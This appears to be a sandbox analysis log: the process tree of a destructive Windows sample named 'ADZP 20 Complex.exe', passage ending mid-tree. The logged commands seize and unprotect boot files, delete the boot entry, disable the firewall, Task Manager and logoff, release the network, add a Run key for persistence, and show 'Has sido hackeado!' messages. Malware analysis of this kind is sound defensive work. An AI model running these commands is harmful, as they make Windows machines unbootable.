- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2976
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2120
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1524
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BC6D.tmp\BC6D.tmp\BC6E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      Drops startup file
      PID:2588
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2752
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:2504
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1940
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:2496
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2444
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:780
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:1772
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2056
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2228
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:1312
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2492
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:1912
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        
        PID:2708
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1456
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1312
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1908
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2804
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2492
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:684
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:916
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2340
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2968
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2356
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2732
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\E6D7.tmp\E6D8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:4700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4292
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7124
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4932
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4148
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4468
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4732
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4224
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5040
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:4736
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4932
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4908
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4820
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6320
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7140
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5856
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:6852
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4360
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7456
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7492
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7540
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7572
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7624
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7692
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7728
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7840
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7920
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7976
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8044
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8084
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8164
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:5540
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:4304
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6364
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6676
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7388
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8232
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8284
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8348
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8392
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8440
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8484
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8504
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10184
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12236
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13284
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13280
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1692
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2140
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3096
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3120
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3136
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E753.tmp\E754.tmp\E755.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:4924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4860
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7032
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4140
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:2712
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4036
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:3236
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3936
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3224
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:4652
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4732
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:3236
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3224
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4028
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6360
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7156
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6372
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7000
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6852
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7532
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7564
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7616
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7676
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7736
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7832
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7928
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7968
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8100
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8188
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7216
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:1224
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7512
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7364
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8240
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8296
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8328
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8408
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8432
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8476
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8512
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8552
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8596
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9232
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12184
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8968
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13416
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3152
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3184
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3204
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3216
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3256
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E936.tmp\E937.tmp\E938.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:4904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3376
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:5972
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4704
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4356
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4520
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:3808
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4332
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4588
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4224
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:3692
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:1188
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5188
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5248
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6572
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:4668
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6984
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:7388
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8140
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8748
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8812
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8880
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8928
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8988
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9060
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9144
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9204
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:4020
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:3764
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9048
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9288
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9328
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9380
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9428
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9548
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9620
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9668
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9768
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9848
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9964
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10032
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10088
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10144
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10308
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12340
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7236
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3272
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3300
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3316
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3324
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3356
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3792
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3268
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4284
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4348
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4624
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4260
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:1772
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:3272
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:3168
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:3908
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        Modifies file permissions
        
        PID:4896
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        
        PID:4692
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3808
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3600
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4464
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4284
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4660
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4348
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4480
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6539.tmp\653A.tmp\653B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:9116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:8448
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:8688
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:11272
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:11644
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:12924
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:13200
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12008
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:11064
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:12188
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
